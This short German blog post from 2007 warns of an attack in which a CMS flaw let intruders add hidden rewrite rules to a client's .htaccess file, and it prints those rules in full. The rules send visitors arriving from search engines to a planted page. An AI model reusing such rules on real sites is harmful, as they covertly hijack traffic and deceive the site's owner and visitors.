Cracker haben neue Masche

16. August 2007

Ein Kunde bekam durch ein Leck in seinem CMS unwissentlich neue Regeln in seine .htaccess hinzugefügt:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z]+\.)?(google|msn|yahoo)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|searchfor|w|p)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|searchfor|w|p)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <57
RewriteRule ^.*$ /extern/jit/oruz/t.htm [L]


Ruft der Kunde seine Seite ganz normal auf, merkt er nichts von seinem neuen Untermieter. Nur wenn er auf einen Link in einer der Suchmaschinen klickt, der eigentlich auf seine Seite führen soll, landet er woanders. Fies.

Security | Kommentare